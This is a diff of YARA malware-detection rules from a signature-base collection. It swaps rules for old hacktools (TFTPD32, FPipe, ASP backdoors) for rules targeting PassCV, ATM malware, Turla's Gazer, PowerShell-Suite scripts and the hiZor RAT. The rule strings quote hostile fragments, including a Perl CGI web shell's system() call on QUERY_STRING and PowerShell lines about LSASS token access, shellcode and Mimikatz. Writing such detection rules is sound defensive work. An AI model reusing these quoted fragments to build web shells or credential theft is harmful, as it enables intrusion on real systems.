 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "27463bcb4301f0fdd95bc10bf67f9049e161a4e51425dac87949387c54c9167f"
 
 	strings:
-		$s1 = "http://go.163.com/sdemo" fullword wide
-		$s2 = "Player.tmp" fullword ascii
-		$s3 = "Player.EXE" fullword wide
-		$s4 = "mailto:sdemo@263.net" fullword ascii
-		$s5 = "S-Player.exe" fullword ascii
-		$s9 = "http://www.BaiXue.net (" wide
+		$s1 = "QWNjZXB0On" fullword ascii
+		$s2 = "VXNlci1BZ2VudDogT" fullword ascii
+		$s3 = "dGFzay5kbnME3luLmN" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
 }
-rule SIGNATURE_BASE_Sig_238_TFTPD32
+rule SIGNATURE_BASE_Passcv_Sabre_Tool_Ntscan : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file TFTPD32.EXE"
+		description = "PassCV Malware mentioned in Cylance Report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "071fba15-affe-539a-bcc0-c14943fff51a"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2220-L2241"
+		id = "6ec3371a-2a1c-53d1-b650-d28728db1b40"
+		date = "2016-10-20"
+		modified = "2023-12-05"
+		reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_passcv.yar#L143-L159"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5c5f8c1a2fa8c26f015e37db7505f7c9e0431fe8"
-		logic_hash = "cbf239330f8f1fd8be3ef3c93571c723447ca3b814fb7c1eff5ea4b2e7f5364f"
-		score = 60
+		logic_hash = "f2b41c1e6db8c9288663cccbf5659484ed415b403068cc566b31aa044bf0de9e"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0f290612b26349a551a148304a0bd3b0d0651e9563425d7c362f30bd492d8665"
 
 	strings:
-		$s0 = " http://arm.533.net" fullword ascii
-		$s1 = "Tftpd32.hlp" fullword ascii
-		$s2 = "Timeouts and Ports should be numerical and can not be 0" fullword ascii
-		$s3 = "TFTPD32 -- " fullword wide
-		$s4 = "%d -- %s" fullword ascii
-		$s5 = "TIMEOUT while waiting for Ack block %d. file <%s>" fullword ascii
-		$s12 = "TftpPort" fullword ascii
-		$s13 = "Ttftpd32BackGround" fullword ascii
-		$s17 = "SOFTWARE\\TFTPD32" fullword ascii
+		$x1 = "NTscan.EXE" fullword wide
+		$x2 = "NTscan Microsoft " fullword wide
+		$s1 = "admin$" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 2 of them )
 }
-rule SIGNATURE_BASE_Sig_238_Iecv
+rule SIGNATURE_BASE_Passcv_Sabre_Malware_5 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file iecv.exe"
+		description = "PassCV Malware mentioned in Cylance Report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "08126db3-267b-5289-b562-40bc264f6e3e"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2243-L2260"
+		id = "ce8d1b9e-7750-5796-a048-20bfd48c6aee"
+		date = "2016-10-20"
+		modified = "2023-12-05"
+		reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_passcv.yar#L161-L182"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6e6e75350a33f799039e7a024722cde463328b6d"
-		logic_hash = "e2985d85030d88cb63eb8b80673812f85aea6e11c6aeb430387cdb8886958b6a"
-		score = 60
+		logic_hash = "30508c6561a2bb908945e9092da1d5cf2257b8b183effcea25a1ba15567f3d20"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "03aafc5f468a84f7dd7d7d38f91ff17ef1ca044e5f5e8bbdfe589f5509b46ae5"
 
 	strings:
-		$s1 = "Edit The Content Of Cookie " fullword wide
-		$s3 = "Accessories\\wordpad.exe" fullword ascii
-		$s4 = "gorillanation.com" fullword ascii
-		$s5 = "Before editing the content of a cookie, you should close all windows of Internet" ascii
-		$s12 = "http://nirsoft.cjb.net" fullword ascii
+		$x1 = "ncircTMPg" fullword ascii
+		$x2 = "~SHELL#" fullword ascii
+		$x3 = "N.adobe.xm" fullword ascii
+		$s1 = "NEL32.DLL" fullword ascii
+		$s2 = "BitLocker.exe" fullword wide
+		$s3 = "|xtplhd" fullword ascii
+		$s4 = "SERVICECORE" fullword wide
+		$s5 = "SHARECONTROL" fullword wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and 1 of ( $x* ) or all of ( $s* ) )
 }
-rule SIGNATURE_BASE_Antiy_Ports_1_21
+
+rule SIGNATURE_BASE_ATM_Malware_Dispenserxfs_1 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file Antiy Ports 1.21.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "eb53fc91-4dec-5416-a2c7-1e8256297886"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2262-L2277"
+		description = "Detects ATM Malware DispenserXFS"
+		author = "@Xylit0l @r3c0nst / Modified by Florian Roth"
+		id = "7c06102c-93d3-52f4-8c25-430f6f7a601f"
+		date = "2019-02-27"
+		modified = "2023-01-06"
+		reference = "https://twitter.com/r3c0nst/status/1100775857306652673"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_atm_dispenserxfs.yar#L4-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ebf4bcc7b6b1c42df6048d198cbe7e11cb4ae3f0"
-		logic_hash = "fb175c413faf0ca33cf166029b217aac31126d6cabc81883c16b2de2ab00c16c"
-		score = 60
+		logic_hash = "3c7331b29f7cd8c40f99e235664f86361ba99c9ca0092c1cfb6faf367764303e"
+		score = 80
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s0 = "AntiyPorts.EXE" fullword wide
-		$s7 = "AntiyPorts MFC Application" fullword wide
-		$s20 = " @Stego:" fullword ascii
+		$xc1 = { 68 FF FF 00 00 68 60 EA 00 00 6A 10 }
+		$s1 = "\\dispenserXFS.pdb" ascii
+		$s3 = "C:\\xfsasdf.txt" fullword ascii
+		$s4 = "Injected mxsfs killer into %d." fullword ascii
+		$s5 = "Waiting for freeze msxfs processes..." fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and ( 1 of them or pe.imphash ( ) == "617e037ae26d1931818db0790fb44bfe" )
 }
-rule SIGNATURE_BASE_Perlcmd_Zip_Folder_Cmd
+rule SIGNATURE_BASE_Gazer_Certificate_1 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file cmd.cgi"
-		author = "Florian Roth (Nextron Systems)"
-		id = "19e4eca0-bd56-57af-afd2-ee2fc5c7c0df"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2279-L2299"
+		description = "Detects Tura's Gazer malware"
+		author = "ESET"
+		id = "4eace653-003e-5cae-9db8-f26502f35fc4"
+		date = "2017-08-30"
+		modified = "2023-12-05"
+		reference = "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_gazer.yar#L27-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "21b5dc36e72be5aca5969e221abfbbdd54053dd8"
-		logic_hash = "4391207d66b7ed5ac2db127d3efcf22f8c2bbd0ee1f0c6982d656b91e5e10c8f"
-		score = 60
+		logic_hash = "ef248ac5cdde0034d940f80b32966fe64841dcf99923dfc0a7035354af963f56"
+		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s0 = "syswrite(STDOUT, \"Content-type: text/html\\r\\n\\r\\n\", 27);" fullword ascii
-		$s1 = "s/%20/ /ig;" fullword ascii
-		$s2 = "syswrite(STDOUT, \"\\r\\n</PRE></HTML>\\r\\n\", 17);" fullword ascii
-		$s4 = "open(STDERR, \">&STDOUT\") || die \"Can't redirect STDERR\";" fullword ascii
-		$s5 = "$_ = $ENV{QUERY_STRING};" fullword ascii
-		$s6 = "$execthis = $_;" fullword ascii
-		$s7 = "system($execthis);" fullword ascii
-		$s12 = "s/%2f/\\//ig;" fullword ascii
+		$certif1 = { 52 76 a4 53 cd 70 9c 18 da 65 15 7e 5f 1f de 02 }
+		$certif2 = { 12 90 f2 41 d9 b2 80 af 77 fc da 12 c6 b4 96 9c }
 
 	condition:
-		6 of them
+		uint16( 0 ) == 0x5a4d and 1 of them and filesize < 2MB
 }
-rule SIGNATURE_BASE_Aspbackdoor_Asp3
+rule SIGNATURE_BASE_Gazer_Logfile_Name_1 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file asp3.txt"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ed86e829-449b-5088-a105-f1fe79547540"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2301-L2321"
+		description = "Detects Tura's Gazer malware"
+		author = "ESET"
+		id = "c10d440f-dc9e-54c8-b329-9f22cba05e86"
+		date = "2017-08-30"
+		modified = "2023-12-05"
+		reference = "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_gazer.yar#L41-L54"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e5588665ca6d52259f7d9d0f13de6640c4e6439c"
-		logic_hash = "c62ae1d32e93a8614a8288ce2df8e26806ab67b3b133067182f0396f0f080b78"
-		score = 60
+		logic_hash = "c893ec41884f106329350c079b087e41a5b9f1040ab0892c90c03972d49dc070"
+		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s0 = "<form action=\"changepwd.asp\" method=\"post\"> " fullword ascii
-		$s1 = "  Set oUser = GetObject(\"WinNT://ComputerName/\" & UserName) " fullword ascii
-		$s2 = "    value=\"<%=Request.ServerVariables(\"LOGIN_USER\")%>\"> " fullword ascii
-		$s14 = " Windows NT " fullword ascii
-		$s16 = " WIndows 2000 " fullword ascii
-		$s18 = "OldPwd = Request.Form(\"OldPwd\") " fullword ascii
-		$s19 = "NewPwd2 = Request.Form(\"NewPwd2\") " fullword ascii
-		$s20 = "NewPwd1 = Request.Form(\"NewPwd1\") " fullword ascii
+		$s1 = "CVRG72B5.tmp.cvr"
+		$s2 = "CVRG1A6B.tmp.cvr"
+		$s3 = "CVRG38D9.tmp.cvr"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule SIGNATURE_BASE_Sig_238_Fpipe
+rule SIGNATURE_BASE_Powershell_Suite_Hacktools_Gen_Strings : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file FPipe.exe"
+		description = "Detects strings from scripts in the PowerShell-Suite repo"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0b2f11d9-a919-5790-8724-d2f028e4fa3a"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2323-L2341"
+		id = "afccdd99-da83-5fde-9e21-52220ded1e47"
+		date = "2017-12-27"
+		modified = "2023-12-05"
+		reference = "https://github.com/FuzzySecurity/PowerShell-Suite"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_suite.yar#L2-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "41d57d356098ff55fe0e1f0bcaa9317df5a2a45c"
-		logic_hash = "ecf143c231aeb37cf9575c3ea8db83c9a049e85a7c95668deeac0878f9c30b9c"
-		score = 60
-		quality = 85
-		tags = ""
+		logic_hash = "0f14a0665c60e85c0cf508f46130b09e467a16270fcd1aa8d0319e17778d4d75"
+		score = 75
+		quality = 83
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "79071ba5a984ee05903d566130467483c197cbc2537f25c1e3d7ae4772211fe0"
+		hash2 = "db31367410d0a9ffc9ed37f423a4b082639591be7f46aca91f5be261b23212d5"
+		hash3 = "4f51e7676a4d54c1962760ca0ac81beb28008451511af96652c31f4f40e8eb8e"
+		hash4 = "17ac9bb0c46838c65303f42a4a346fcba838ebd5833b875e81dd65c82701d8a8"
+		hash5 = "fa33aef619e620a88ecccb990e71c1e11ce2445f799979d23be2d1ad4321b6c6"
+		hash6 = "5542bd89005819bc4eef8dfc8a158183e5fd7a1438c84da35102588f5813a225"
+		hash7 = "c6a99faeba098eb411f0a9fcb772abac2af438fc155131ebfc93a00e3dcfad50"
+		hash8 = "a8e06ecf5a8c25619ce85f8a23f2416832cabb5592547609cfea8bd7fcfcc93d"
+		hash9 = "6aa5abf58904d347d441ac8852bd64b2bad3b5b03b518bdd06510931a6564d08"
+		hash10 = "5608f25930f99d78804be8c9c39bd33f4f8d14360dd1e4cc88139aa34c27376d"
+		hash11 = "68b6c0b5479ecede3050a2f44f8bb8783a22beeef4a258c4ff00974f5909b714"
+		hash12 = "da25010a22460bbaabff0f7004204aae7d830348e8a4543177b1f3383b2c3100"
 
 	strings:
-		$s0 = "made to port 80 of the remote machine at 192.168.1.101 with the" fullword ascii
-		$s1 = "Unable to resolve hostname \"%s\"" fullword ascii
-		$s2 = "source port for that outbound connection being set to 53 also." fullword ascii
-		$s3 = " -s    - outbound source port number" fullword ascii
-		$s5 = "http://www.foundstone.com" fullword ascii
-		$s20 = "Attempting to connect to %s port %d" fullword ascii
+		$ = "[!] NtCreateThreadEx failed.." fullword ascii
+		$ = "[?] Executing mmc.." ascii
+		$ = "[!] This method is only supported on 64-bit!" fullword ascii
+		$ = "$LNK = [ShellLink.Shortcut]::FromByteArray($LNKHeader.GetBytes())" fullword ascii
+		$ = "$CallResult = [UACTokenMagic]::TerminateProcess($ShellExecuteInfo.hProcess, 1)" fullword ascii
+		$ = "[!] Unable to open process (as Administrator), this may require SYSTEM access." fullword ascii
+		$ = "[!] Error, NTSTATUS Value: " ascii
+		$ = "[!] UAC artifact: " ascii
+		$ = "[>] Process dump success!" ascii
+		$ = "[!] Process dump failed!" ascii
+		$ = "[+] Eidolon entry point:" fullword ascii
+		$ = "Wait for shellcode to run" fullword ascii
+		$ = "$Command = Read-Host \"`nSMB shell\"" fullword ascii
+		$ = "Use Netapi32::NetSessionEnum to enumerate active sessions on domain joined machines." fullword ascii
+		$ = "Invoke-CreateProcess -Binary C:\\Windows\\System32\\" ascii
+		$ = "[?] Thread belongs to: " ascii
+		$ = "[?] Operating system core count: " ascii
+		$ = "[>] Calling Advapi32::LookupPrivilegeValue --> SeDebugPrivilege" fullword ascii
+		$ = "Calling Advapi32::OpenProcessToken --> LSASS" ascii
+		$ = "[!] Mmm, something went wrong! GetLastError returned:" ascii
+		$ = "if (($FileBytes[0..1] | % {[Char]$_}) -join '' -cne 'MZ')" fullword ascii
 
 	condition:
-		all of them
+		filesize < 100KB and 1 of them
 }
-rule SIGNATURE_BASE_Sig_238_Concon
+rule SIGNATURE_BASE_Powershell_Suite_Eidolon : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file concon.com"
+		description = "Detects PowerShell Suite Eidolon script - file Start-Eidolon.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ca7862cc-1053-5fce-a569-6ecc069314df"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2343-L2356"
+		id = "5440d8fc-b939-556f-a8a0-ef5feb29e32f"
+		date = "2017-12-27"
+		modified = "2023-12-05"
+		reference = "https://github.com/FuzzySecurity/PowerShell-Suite"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_suite.yar#L48-L63"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "816b69eae66ba2dfe08a37fff077e79d02b95cc1"
-		logic_hash = "c45955cc59970657f8787ddc0e549939d2fa30d11cfd19fd12cd9067abb3bcd6"
-		score = 60
+		logic_hash = "587a9a8569801e2aa96a6f171705fdc1db5632734b54e5a9eb8282502e1efc63"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "db31367410d0a9ffc9ed37f423a4b082639591be7f46aca91f5be261b23212d5"
 
 	strings:
-		$s0 = "Usage: concon \\\\ip\\sharename\\con\\con" fullword ascii
+		$ = "[+] Eidolon entry point:" ascii
+		$ = "C:\\PS> Start-Eidolon -Target C:\\Some\\File.Path -Mimikatz -Verbose" fullword ascii
+		$ = "[Int16]$PEArch = '0x{0}' -f ((($PayloadBytes[($OptOffset+1)..($OptOffset)]) | % {$_.ToString('X2')}) -join '')" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x7566 and filesize < 13000KB and 1 of them
 }
-rule SIGNATURE_BASE_Aspbackdoor_Regdll
+rule SIGNATURE_BASE_SUSP_ELF_SPARC_Hunting_SBZ_Obfuscation : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file regdll.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "37096c50-68d0-5412-847a-022062a5ff2a"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2358-L2374"
+		description = "This rule is UNTESTED against a large dataset and is for hunting purposes only."
+		author = "netadr, modified by Florian Roth to avoid elf module import"
+		id = "15ee9a66-d823-508c-a14c-2c6ff45f47e5"
+		date = "2023-04-02"
+		modified = "2023-05-08"
+		reference = "https://netadr.github.io/blog/a-quick-glimpse-sbz/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_sparc_sbz_apr23.yar#L2-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5c5e16a00bcb1437bfe519b707e0f5c5f63a488d"
-		logic_hash = "89606ccf4341ba9451fd1bfbc818bbcd55d45d50e06f09b9f1ecd8efb3c322af"
+		logic_hash = "3d45dc8d8dbc62cee6b7ec4aa842eaa88bd23aea17e995eef4850fd91e7069a3"
 		score = 60
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s1 = "exitcode = oShell.Run(\"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, " ascii
-		$s3 = "oShell.Run \"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, False" fullword ascii
-		$s4 = "EchoB(\"regsvr32.exe exitcode = \" & exitcode)" fullword ascii
-		$s5 = "Public Property Get oFS()" fullword ascii
+		$xor_block = { 9A 18 E0 47 9A 1B 40 01 9A 18 80 0D }
+		$a1 = "SUNW_"
 
 	condition:
-		all of them
+		uint32be( 0 ) == 0x7f454c46 and $a1 and $xor_block
 }
-rule SIGNATURE_BASE_Cleaniislog
+rule SIGNATURE_BASE_SUSP_ELF_SPARC_Hunting_SBZ_Uniquestrings
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file CleanIISLog.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "439726c6-3262-59ef-9a54-7dcd98cf924d"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2376-L2397"
+		description = "This rule is UNTESTED against a large dataset and is for hunting purposes only."
+		author = "netadr, modified by Florian Roth for performance reasons"
+		id = "d2f70d10-412e-5e83-ba4f-eac251012dc1"
+		date = "2023-04-02"
+		modified = "2023-05-08"
+		reference = "https://netadr.github.io/blog/a-quick-glimpse-sbz/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_sparc_sbz_apr23.yar#L26-L47"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "827cd898bfe8aa7e9aaefbe949d26298f9e24094"
-		logic_hash = "77a26e57b36f73d4d2730bc3a4d8485718119e2ccc80b40de3515ec688616eb9"
+		logic_hash = "bb95fc6bda0a0ed8ffc6db9734c725c487b0e70909d60119bf58d60987daaaeb"
 		score = 60
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "CleanIP - Specify IP Address Which You Want Clear." fullword ascii
-		$s2 = "LogFile - Specify Log File Which You Want Process." fullword ascii
-		$s8 = "CleanIISLog Ver" fullword ascii
-		$s9 = "msftpsvc" fullword ascii
-		$s10 = "Fatal Error: MFC initialization failed" fullword ascii
-		$s11 = "Specified \"ALL\" Will Process All Log Files." fullword ascii
-		$s12 = "Specified \".\" Will Clean All IP Record." fullword ascii
-		$s16 = "Service %s Stopped." fullword ascii
-		$s20 = "Process Log File %s..." fullword ascii
+		$s1 = "<%u>[%s] Event #%u: "
+		$s2 = "lprc:%08X" ascii fullword
+		$s3 = "diuXxobB"
+		$s4 = "CHM_FW"
 
 	condition:
-		5 of them
+		2 of ( $* )
 }
-rule SIGNATURE_BASE_Sqlcheck
+rule SIGNATURE_BASE_SUSP_ELF_SPARC_Hunting_SBZ_Modulestruct : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file sqlcheck.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a72d38ef-b2e7-5051-8538-724d9e95fa6a"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2399-L2416"
+		description = "This rule is UNTESTED against a large dataset and is for hunting purposes only."
+		author = "netadr, modified by Florian Roth for FP reduction reasons"
+		id = "909746f1-44f5-597b-bdb2-2a1396d4b8c7"
+		date = "2023-04-02"
+		modified = "2023-05-08"
+		reference = "https://netadr.github.io/blog/a-quick-glimpse-sbz/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_sparc_sbz_apr23.yar#L49-L65"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5a5778ac200078b627db84fdc35bf5bcee232dc7"
-		logic_hash = "e9c1d7cabe7236e059f4bfec917ca00c47a3db955746ebfcda0f5e733de359c7"
+		logic_hash = "dc9608c769dcb14ba01559bfe2e8ed03eebf5695b867b53742f26e3fcce389ca"
 		score = 60
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s0 = "Power by eyas<cooleyas@21cn.com>" fullword ascii
-		$s3 = "\\ipc$ \"\" /user:\"\"" fullword ascii
-		$s4 = "SQLCheck can only scan a class B network. Try again." fullword ascii
-		$s14 = "Example: SQLCheck 192.168.0.1 192.168.0.254" fullword ascii
-		$s20 = "Usage: SQLCheck <StartIP> <EndIP>" fullword ascii
+		$be = { 02 02 00 00 01 C1 00 07 }
+		$le = { 02 02 00 00 07 00 C1 01 }
 
 	condition:
-		3 of them
+		uint32be( 0 ) == 0x7f454c46 and ( $be or $le )
 }
-rule SIGNATURE_BASE_Sig_238_Runasex
+rule SIGNATURE_BASE_Apt_Win32_Dll_Rat_Hizorrat : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file RunAsEx.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5fe349db-c0fc-5a49-97ee-3142f4e0e4c1"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2418-L2436"
+		description = "Detects hiZor RAT"
+		author = "Florian Roth"
+		id = "06fd02f2-2630-5aac-8011-67d67ff42c3f"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://www.fidelissecurity.com/sites/default/files/FTA_1020_Fidelis_Inocnation_FINAL.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hizor_rat.yar#L1-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a22fa4e38d4bf82041d67b4ac5a6c655b2e98d35"
-		logic_hash = "dac03251539028da02c9f26f20ca751ee577c125fb4f287c61ac2ea6afb1bb28"
-		score = 60
+		logic_hash = "4e3224d34db788d2cba9da74690bf75429d6e8a516d7666d0331e465d08640cb"
+		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "75d3d1f23628122a64a2f1b7ef33f5cf"
+		hash2 = "d9821468315ccd3b9ea03161566ef18e"
+		hash3 = "b9af5f5fd434a65d7aa1b55f5441c90a"
 
 	strings:
-		$s0 = "RunAsEx By Assassin 2000. All Rights Reserved. http://www.netXeyes.com" fullword ascii
-		$s8 = "cmd.bat" fullword ascii
-		$s9 = "Note: This Program Can'nt Run With Local Machine." fullword ascii
-		$s11 = "%s Execute Succussifully." fullword ascii
-		$s12 = "winsta0" fullword ascii
-		$s15 = "Usage: RunAsEx <UserName> <Password> <Execute File> [\"Execute Option\"]" fullword ascii
+		$s1 = { c7 [5] 40 00 62 00 c7 [5] 77 00 64 00 c7 [5] 61 00 61 00 c7 [5] 6c 00 }
+		$s2 = { 66 [7] 0d 40 83 ?? ?? 7c ?? }
+		$s3 = { 80 [2] 2e 40 3b ?? 72 ?? }
+		$s4 = "CmdProcessExited" wide ascii
+		$s5 = "rootDir" wide ascii
+		$s6 = "DllRegisterServer" wide ascii
+		$s7 = "GetNativeSystemInfo" wide ascii
+		$s8 = "%08x%08x%08x%08x" wide ascii
 
 	condition:
-		4 of them
+		( uint16( 0 ) == 0x5A4D or uint32( 0 ) == 0x464c457f ) and ( all of them )
 }
-rule SIGNATURE_BASE_Sig_238_Nbtdump
+
+rule SIGNATURE_BASE_PUA_Anydesk_Compromised_Certificate_Revoked_Jan24 : FILE
 {
 	meta:
-		description = "Disclosed hacktool set (old stuff) - file nbtdump.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "fe490f72-a07d-57c2-b9bb-d791fab10ec6"
-		date = "2014-11-23"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L2438-L2457"
